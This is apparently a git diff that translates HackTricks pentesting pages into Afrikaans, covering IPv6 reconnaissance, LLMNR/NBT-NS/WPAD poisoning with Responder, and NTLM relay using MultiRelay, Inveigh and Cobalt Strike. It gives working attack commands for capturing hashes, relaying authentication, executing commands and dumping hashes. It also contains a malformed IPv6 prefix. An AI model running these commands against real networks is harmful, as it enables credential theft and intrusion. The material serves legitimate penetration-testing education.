3. **Interface-identifiseerder**: Die afsluitende 64-bits, wat 'n toestel uniek identifiseer binne die subnet.
While IPv6 omits the ARP protocol found in IPv4, it introduces **ICMPv6** with two primary messages:
- **Neighbor Solicitation (NS)**: Multicast messages for address resolution.
- **Neighbor Advertisement (NA)**: Unicast responses to NS or spontaneous announcements.
Terwyl IPv6 die ARP-protokol wat in IPv4 gevind word, uitsluit, voer dit **ICMPv6** in met twee primêre boodskappe:
- **Neighbor Solicitation (NS)**: Multicast-boodskappe vir adresoplossing.
- **Neighbor Advertisement (NA)**: Unicast-respons op NS of spontane aankondigings.
IPv6 also incorporates special address types:
- **Loopback Address (`::1`)**: Equivalent to IPv4's `127.0.0.1`, for internal communication within the host.
- **Link-Local Addresses (`FE80::/10`)**: For local network activities, not for internet routing. Devices on the same local network can discover each other using this range.
IPv6 inkorporeer ook spesiale adressoorte:
- **Loopback-adres (`::1`)**: Gelykwaardig aan IPv4 se `127.0.0.1`, vir interne kommunikasie binne die gasheer.
- **Link-Local-adresse (`FE80::/10`)**: Vir plaaslike netwerkaktiwiteite, nie vir internetroetevering nie. Toestelle op dieselfde plaaslike netwerk kan mekaar ontdek deur hierdie reeks te gebruik.
### Practical Usage of IPv6 in Network Commands
### Praktiese Gebruik van IPv6 in Netwerkopdragte
To interact with IPv6 networks, you can use various commands:
- **Ping Link-Local Addresses**: Check the presence of local devices using `ping6`.
- **Neighbor Discovery**: Use `ip neigh` to view devices discovered at the link layer.
- **alive6**: An alternative tool for discovering devices on the same network.
Below are some command examples:
Om met IPv6-netwerke te kommunikeer, kan jy verskeie opdragte gebruik:
- **Ping Link-Local-adresse**: Kontroleer die teenwoordigheid van plaaslike toestelle met behulp van `ping6`.
- **Neighbor Discovery**: Gebruik `ip neigh` om toestelle wat by die skakellaag ontdek is, te sien.
- **alive6**: 'n Alternatiewe hulpmiddel vir die ontdekking van toestelle op dieselfde netwerk.
Hieronder is 'n paar voorbeelde van opdragte:
```bash
ping6 I eth0 -c 5 ff02::1 > /dev/null 2>&1
ip neigh | grep ^fe80
@ -49,74 +46,68 @@ ip neigh | grep ^fe80
# Alternatively, use alive6 for neighbor discovery
alive6 eth0
```
IPv6-adresse kan afgelei word van 'n toestel se MAC-adres vir plaaslike kommunikasie. Hier is 'n vereenvoudigde gids oor hoe om die Skakelplaaslike IPv6-adres af te lei van 'n bekende MAC-adres, en 'n kort oorsig van IPv6-adres tipes en metodes om IPv6-adresse binne 'n netwerk te ontdek.
IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network.
## **Afleiding van Skakelplaaslike IPv6 vanaf MAC-adres**
## **Deriving Link-local IPv6 from MAC Address**
Gegee 'n MAC-adres **`12:34:56:78:9a:bc`**, kan jy die Skakelplaaslike IPv6-adres as volg konstrueer:
Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows:
1. Omskep MAC na IPv6-formaat: **`1234:5678:9abc`**
2. Voeg `fe80::` voor en voeg `fffe` in die middel in: **`fe80::1234:56ff:fe78:9abc`**
3. Keer die sewende bit van links af om, verander `1234` na `1034`: **`fe80::1034:56ff:fe78:9abc`**
1. Convert MAC to IPv6 format: **`1234:5678:9abc`**
2. Prepend `fe80::` and insert `fffe` in the middle: **`fe80::1234:56ff:fe78:9abc`**
3. Invert the seventh bit from the left, changing `1234` to `1034`: **`fe80::1034:56ff:fe78:9abc`**
## **IPv6-adrestipes**
## **IPv6 Address Types**
- **Unieke Lokale Adres (ULA)**: Vir plaaslike kommunikasie, nie bedoel vir openbare internetroetering nie. Voorvoegsel: **`FEC00::/7`**
- **Multicast-adres**: Vir een-tot-baie kommunikasie. Afgelewer aan alle koppelvlakke in die multicast-groep. Voorvoegsel: **`FF00::/8`**
- **Anycast-adres**: Vir een-tot-naaste kommunikasie. Gestuur na die naaste koppelvlak volgens die roeteprotokol. Deel van die globale unicast-reeks **`2000::/3`**.
- **Unique Local Address (ULA)**: For local communications, not meant for public internet routing. Prefix: **`FEC00::/7`**
- **Multicast Address**: For one-to-many communication. Delivered to all interfaces in the multicast group. Prefix: **`FF00::/8`**
- **Anycast Address**: For one-to-nearest communication. Sent to the closest interface as per routing protocol. Part of the **`2000::/3`** global unicast range.
## **Adresvoorvoegsels**
- **fe80::/10**: Skakelplaaslike adresse (soortgelyk aan 169.254.x.x)
- **fc00::/7**: Unieke Lokale-Unicast (soortgelyk aan privaat IPv4-reeks soos 10.x.x.x, 172.16.x.x, 192.168.x.x)
- **2000::/3**: Globale Unicast
- **ff02::1**: Multicast Alle Knope
- **ff02::2**: Multicast Router Knope
## **Address Prefixes**
- **fe80::/10**: Link-Local addresses (similar to 169.254.x.x)
- **fc00::/7**: Unique Local-Unicast (similar to private IPv4 ranges like 10.x.x.x, 172.16.x.x, 192.168.x.x)
- **2000::/3**: Global Unicast
- **ff02::1**: Multicast All Nodes
- **ff02::2**: Multicast Router Nodes
## **Ontdekking van IPv6-adresse binne 'n Netwerk**
## **Discovering IPv6 Addresses within a Network**
### Way 1: Using Link-local Addresses
1. Obtain the MAC address of a device within the network.
2. Derive the Link-local IPv6 address from the MAC address.
### Way 2: Using Multicast
1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network.
### Metode 1: Gebruik van Skakelplaaslike Adresse
1. Verkry die MAC-adres van 'n toestel binne die netwerk.
2. Leid die Skakelplaaslike IPv6-adres af van die MAC-adres.
### Metode 2: Gebruik van Multicast
1. Stuur 'n ping na die multicast-adres `ff02::1` om IPv6-adresse op die plaaslike netwerk te ontdek.
```bash
service ufw stop # Stop the firewall
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
ip -6 neigh # Display the neighbor table
```
## IPv6 Man-in-the-Middle (MitM) Aanvalle
Verskeie tegnieke bestaan vir die uitvoering van MitM-aanvalle in IPv6-netwerke, soos:
## IPv6 Man-in-the-Middle (MitM) Attacks
Several techniques exist for executing MitM attacks in IPv6 networks, such as:
- Spoofing ICMPv6 neighbor or router advertisements.
- Using ICMPv6 redirect or "Packet Too Big" messages to manipulate routing.
- Attacking mobile IPv6 (usually requires IPSec to be disabled).
- Setting up a rogue DHCPv6 server.
- Spoofing van ICMPv6-buurman of roeteadvertensies.
- Gebruik van ICMPv6-omleiding of "Pakket Te Groot" boodskappe om roetes te manipuleer.
- Aanvalle op mobiele IPv6 (vereis gewoonlik dat IPSec gedeaktiveer word).
- Opstel van 'n valse DHCPv6-bediener.
# Identifying IPv6 Addresses in the eild
## Exploring Subdomains
A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google:
# Identifisering van IPv6-adresse in die veld
## Verkenning van Subdomeine
'n Metode om subdomeine te vind wat moontlik gekoppel is aan IPv6-adresse, behels die gebruik van soektogmasjiene. Byvoorbeeld, die gebruik van 'n soekpatroon soos `ipv6.*` kan effektief wees. Spesifiek kan die volgende soekopdrag in Google gebruik word:
```bash
site:ipv6./
```
## Die gebruik van DNS-navrae
Om IPv6-adresse te identifiseer, kan sekere DNS-rekordtipes ondervra word:
- **AXFR**: Versoek 'n volledige sone-oordrag en kan 'n wye verskeidenheid DNS-rekords blootlê.
- **AAAA**: Soek direk na IPv6-adresse.
- **ANY**: 'n Breë navraag wat alle beskikbare DNS-rekords teruggee.
## Utilizing DNS Queries
To identify IPv6 addresses, certain DNS record types can be queried:
- **AXFR**: Requests a complete zone transfer, potentially uncovering a wide range of DNS records.
- **AAAA**: Directly seeks out IPv6 addresses.
- **ANY**: A broad query that returns all available DNS records.
## Ondersoek met Ping6
Nadat IPv6-adresse wat met 'n organisasie verband hou, geïdentifiseer is, kan die `ping6` nut gebruik word vir ondersoek. Hierdie hulpmiddel help om die reaksievermoë van geïdentifiseerde IPv6-adresse te assesseer en kan ook help om aangrensende IPv6-toestelle te ontdek.
## Probing with Ping6
After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
## References
## Verwysings
* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
@ -124,16 +115,14 @@ After pinpointing IPv6 addresses associated with an organization, the `ping6` ut
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

141
generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View file

@ -1,85 +1,82 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
# Spoofing LLMNR, NBT-NS, mDNS/DNS en WPAD en Relay-aanvalle
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Network Protocols
## Netwerkprotokolle
### Local Host Resolution Protocols
- **LLMNR, NBT-NS, and mDNS**:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Plaaslike Gasresolusieprotokolle
- **LLMNR, NBT-NS en mDNS**:
- Microsoft en ander bedryfstelsels gebruik LLMNR en NBT-NS vir plaaslike naamresolusie wanneer DNS misluk. Soortgelyk gebruik Apple- en Linux-stelsels mDNS.
- Hierdie protokolle is vatbaar vir onderskepping en vervalsing as gevolg van hul ongeagte, uitsaai-aard oor UDP.
- [Responder](https://github.com/lgandx/Responder) kan gebruik word om dienste na te boots deur vervalsde antwoorde na gasheerstelsels te stuur wat hierdie protokolle ondervra.
- Verdere inligting oor diensnabootsing met behulp van Responder is beskikbaar [hier](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically.
- Discovery is facilitated via DHCP, DNS, or fallback to LLMNR and NBT-NS if DNS fails.
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
- WPAD maak dit vir webblaaier moontlik om outomaties proksi-instellings te ontdek.
- Ontdekking word fasiliteer deur middel van DHCP, DNS, of terugval na LLMNR en NBT-NS as DNS misluk.
- Responder kan WPAD-aanvalle outomatiseer deur kliënte na skadelike WPAD-bedieners te rig.
### Responder for Protocol Poisoning
- **Responder** is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.
- It comes pre-installed in Kali Linux, configurable at `/etc/responder/Responder.conf`.
- Responder displays captured hashes on the screen and saves them in the `/usr/share/responder/logs` directory.
- It supports both IPv4 and IPv6.
- Windows version of Responder is available [here](https://github.com/lgandx/Responder-Windows).
### Responder vir Protokolvergiftiging
- **Responder** is 'n hulpmiddel wat gebruik word vir die vergiftiging van LLMNR-, NBT-NS- en mDNS-navrae, selektief antwoord gee op navraagtipes en hoofsaaklik op SMB-dienste teiken.
- Dit is vooraf geïnstalleer in Kali Linux en kan gekonfigureer word by `/etc/responder/Responder.conf`.
- Responder vertoon gevangenome wagwoorde op die skerm en stoor dit in die `/usr/share/responder/logs`-gids.
- Dit ondersteun beide IPv4 en IPv6.
- 'n Windows-weergawe van Responder is beskikbaar [hier](https://github.com/lgandx/Responder-Windows).
#### Running Responder
- To run Responder with default settings: `responder -I <Interface>`
- For more aggressive probing (with potential side effects): `responder -I <Interface> -P -r -v`
- Techniques to capture NTLMv1 challenges/responses for easier cracking: `responder -I <Interface> --lm --disable-ess`
- WPAD impersonation can be activated with: `responder -I <Interface> --wpad`
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: `responder.py -I <interface> -Pv`
#### Uitvoering van Responder
- Om Responder met verstekinstellings uit te voer: `responder -I <Interface>`
- Vir meer aggressiewe ondersoek (met potensiële newe-effekte): `responder -I <Interface> -P -r -v`
- Tegnieke om NTLMv1-uitdagings/antwoorde vir makliker kraak vas te vang: `responder -I <Interface> --lm --disable-ess`
- WPAD-nabootsing kan geaktiveer word met: `responder -I <Interface> --wpad`
- NetBIOS-navrae kan na die aanvaller se IP opgelos word, en 'n outentiseringsproksi kan opgestel word: `responder.py -I <interface> -Pv`
### DHCP Poisoning with Responder
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
- It requires precise knowledge of the target network's configuration.
- Running the attack: `./Responder.py -I eth0 -Pdv`
- This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid network disruption.
### DHCP-vergiftiging met Responder
- Die vervalsing van DHCP-antwoorde kan 'n slagoffer se roeteringinligting permanent vergiftig en bied 'n stilistiese alternatief vir ARP-vergiftiging.
- Dit vereis presiese kennis van die konfigurasie van die teikennetwerk.
- Uitvoering van die aanval: `./Responder.py -I eth0 -Pdv`
- Hierdie metode kan effektief NTLMv1/2-wagwoorde vasvang, maar dit vereis sorgvuldige hantering om netwerkversteuring te voorkom.
### Capturing Credentials with Responder
- Responder will impersonate services using the above-mentioned protocols, capturing credentials (usually NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
- Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.
### Vasvang van Gelde met Responder
- Responder sal dienste naboots deur die bogenoemde protokolle te gebruik en gelde (gewoonlik NTLMv2-uitdaging/antwoord) vasvang wanneer 'n gebruiker probeer outentiseer teenoor die vervalsde dienste.
- Pogings kan aangewend word om af te gradeer na NetNTLMv1 of ESS uit te skakel vir makliker kraak van gelde.
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
Dit is van kritieke belang om daarop te let dat die gebruik van hierdie tegnieke wettig en eties moet geskied, met behoorlike magtiging en sonder versteuring of ongemagtigde toegang.
## Inveigh
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh can be operated through PowerShell:
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi-spanne, ontwerp vir Windows-stelsels. Dit bied funksionaliteite soortgelyk aan Responder, wat vervalsing en man-in-die-middel-aanvalle uitvoer. Die hulpmiddel het ontwikkel vanaf 'n PowerShell-skripsie na 'n C#-binêre, met [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) en [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as die hoofweergawes. Gedetailleerde parameters en instruksies kan gevind word in die [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
Inveigh kan bedryf word deur middel van PowerShell:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Or executed as a C# binary:
Of uitgevoer as 'n C# binêre lêer:
```bash
Inveigh.exe
```
### NTLM Relay-aanval
### NTLM Relay Attack
Hierdie aanval maak gebruik van SMB-verifikasiesessies om toegang tot 'n teikermasjien te verkry en verleen 'n stelselskulp as dit suksesvol is. Sleutelvereistes sluit in:
- Die verifiserende gebruiker moet plaaslike administratiewe toegang tot die herleide gasheer hê.
- SMB-ondertekening moet gedeaktiveer wees.
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
- The authenticating user must have Local Admin access on the relayed host.
- SMB signing should be disabled.
#### 445 Poort deurstuur en tonneling
#### 445 Port Forwarding and Tunneling
In situasies waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 deurgestuur en getunnel word. Hulpmiddels soos [**PortBender**](https://github.com/praetorian-inc/PortBender) help om poort 445-verkeer na 'n ander poort om te lei, wat noodsaaklik is wanneer plaaslike administratiewe toegang vir bestuurderlaaiing beskikbaar is.
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
PortBender setup and operation in Cobalt Strike:
PortBender-opstelling en bedryf in Cobalt Strike:
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
@ -95,18 +92,17 @@ beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### Ander Hulpmiddels vir NTLM Relay-aanval
### Other Tools for NTLM Relay Attack
- **Metasploit**: Stel op met proksi's, plaaslike en afgeleë gasheerbesonderhede.
- **smbrelayx**: 'n Python-skrips vir die oordra van SMB-sessies en die uitvoering van opdragte of die implementering van agterdeure.
- **MultiRelay**: 'n Hulpmiddel uit die Responder-pakket om spesifieke gebruikers of alle gebruikers te oordra, opdragte uit te voer of hase te dump.
- **Metasploit**: Set up with proxies, local and remote host details.
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
- **MultiRelay**: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
Elke hulpmiddel kan gekonfigureer word om deur 'n SOCKS-proksi te werk as dit nodig is, wat aanvalle selfs met indirekte netwerktoegang moontlik maak.
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
### MultiRelay-bedryf
### MultiRelay Operation
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
MultiRelay word uitgevoer vanuit die _**/usr/share/responder/tools**_ gids en teiken spesifieke IP-adresse of gebruikers.
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
@ -114,35 +110,34 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
Hierdie gereedskap en tegnieke vorm 'n omvattende stel vir die uitvoering van NTLM Relay-aanvalle in verskillende netwerkomgewings.
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
### Dwang NTLM-aantekeninge af
### Force NTLM Logins
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
In Windows **kan jy dalk sommige bevoorregte rekeninge dwing om te verifieer teen willekeurige masjiene**. Lees die volgende bladsy om te leer hoe:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
## References
## Verwysings
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

56
generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md
View file

@ -1,53 +1,53 @@
# Spoofing SSDP and UPnP Devices with EvilSSDP
# Spoofing SSDP en UPnP-toestelle met EvilSSDP
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
**Check [https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) for further information.**
**Kyk na [https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) vir verdere inligting.**
## **SSDP & UPnP Overview**
## **SSDP & UPnP-oorsig**
SSDP (Simple Service Discovery Protocol) is utilized for network service advertising and discovery, operating on UDP port 1900 without needing DHCP or DNS configurations. It's fundamental in UPnP (Universal Plug and Play) architecture, facilitating seamless interaction among networked devices like PCs, printers, and mobile devices. UPnP's zero-configuration networking supports device discovery, IP address assignment, and service advertising.
SSDP (Simple Service Discovery Protocol) word gebruik vir netwerkdienste-advertering en -ontdekking, wat op UDP-poort 1900 werk sonder om DHCP- of DNS-konfigurasies nodig te hê. Dit is fundamenteel in die UPnP (Universal Plug and Play) argitektuur, wat naadlose interaksie tussen netwerktoestelle soos rekenaars, drukkers en mobiele toestelle fasiliteer. UPnP se zero-configuration networking ondersteun toestelontdekking, IP-adres toewysing en diens-advertering.
## **UPnP Flow & Structure**
## **UPnP-vloei en struktuur**
UPnP architecture comprises six layers: addressing, discovery, description, control, eventing, and presentation. Initially, devices attempt to obtain an IP address or self-assign one (AutoIP). The discovery phase involves the SSDP, with devices actively sending M-SEARCH requests or passively broadcasting NOTIFY messages to announce services. The control layer, vital for client-device interaction, leverages SOAP messages for command execution based on device descriptions in XML files.
